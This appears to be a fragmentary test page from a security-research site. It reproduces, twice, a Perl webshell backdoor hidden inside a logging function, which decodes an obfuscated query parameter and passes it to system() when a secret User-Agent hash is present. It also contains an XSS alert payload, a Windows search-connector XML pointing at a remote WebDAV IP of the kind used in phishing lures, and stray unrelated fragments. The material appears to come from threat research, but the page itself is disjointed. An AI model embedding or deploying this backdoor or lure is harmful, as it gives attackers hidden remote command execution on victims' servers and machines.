Light Dark
June 5, 2024 By neandro.avelino < 1 min read
Topics

code test

sub Msg {
  my ($event, $level, $data) = @_;
  my ($pkg, $file, $line) = caller;
 
— start of webshell code —
  my $ua = $ENV{HTTP_USER_AGENT};
  my $req = $ENV{QUERY_STRING};
  my $qur = “3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6”;
  my @param = split(/&/, $req);
  if (index($ua, $qur) != -1) {
    if ($param[1]){
      my @res = split(/=/, $param[1]);
      if ($res[0] eq “cdi”){
        $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
        $res[1] =~ tr/!-~/P-~!-O/;
        system(${res[1]});
      }
    }
  }
 
— end of webshell code —
  $file = substr ($file, rindex ($file, “/”)+1);
  # Prevent C printf format codes to make it through…
  $data =~ s/%/%%/g;
  Msg_impl ($file, $line, $event, $level, $data);
}

Using X-Force code snippet:

<code>sub Msg {
  my ($event, $level, $data) = @_;
  my ($pkg, $file, $line) = caller;
 
— start of webshell code —
  my $ua = $ENV{HTTP_USER_AGENT};
  my $req = $ENV{QUERY_STRING};
  my $qur = “3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6”;
  my @param = split(/&/, $req);
  if (index($ua, $qur) != -1) {
    if ($param[1]){
      my @res = split(/=/, $param[1]);
      if ($res[0] eq “cdi”){
        $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
        $res[1] =~ tr/!-~/P-~!-O/;
        system(${res[1]});
      }
    }
  }
 
— end of webshell code —
  $file = substr ($file, rindex ($file, “/”)+1);
  # Prevent C printf format codes to make it through…
  $data =~ s/%/%%/g;
  Msg_impl ($file, $line, $event, $level, $data);
}</code>

Another:

<script>alert(“hi”)</script>


Tester:

<?xml version=”1.0″?>

<persistedQuery version=”1.0″>

<viewInfo viewMode=”icons” iconSize=”256″ stackIconSize=”0″ displayName=”Documents” autoListFlags=”0″>

<visibleColumns>

<column viewField=”System.ItemNameDisplay”/>

</visibleColumns>

<sortList>

<sort viewField=”System.ItemNameDisplay” direction=”ascending”/>

</sortList>

</viewInfo>

<query>

<kindList>

<kind name=”item”/>

</kindList>

<scope>

<include path=”::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\\148.252.42[.]42@80\documents\Tender” attributes=”1887437183″/>

</scope>

</query>

<properties>

<author Type=”string”>user</author>

</properties> </persistedQuery> 

cmd.exe

char()

varchar()

(hex($1))

<p style=”font-family:courier;”>This is a paragraph.</p>
<p style=”background-color:Tomato;”>Lorem ipsum…</p>

neandro.avelino

More from Topics
May 16, 2024

X-force testing

16 min read - Grandoreiro banking trojan unleashed: X-Force observing emerging global campaigns Authors: Golo Mühr Source: IBM Security Intelligence https://images2.cmp.optimizely.com/Zz1kNmRkZDI4NDEzODExMWVmOGUyNGUyZjZiN2ZmZDE4ZA== Since March 2024, IBM X-Force has been tracking several large-scale phishing campaigns distributing the Grandoreiro banking trojan, which is likely operated as a Malware-as-a-Service (MaaS). Analysis of the malware revealed major updates within the string decryption and domain generating algorithm (DGA), as well as the ability to use Microsoft Outlook clients on infected hosts to spread further phishing emails. The latest malware variant…

Topic updates

 Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today
© 2024 IBM Contact Privacy Terms of use Accessibility Cookie Preferences
Sponsored by si-icon-eightbarfeature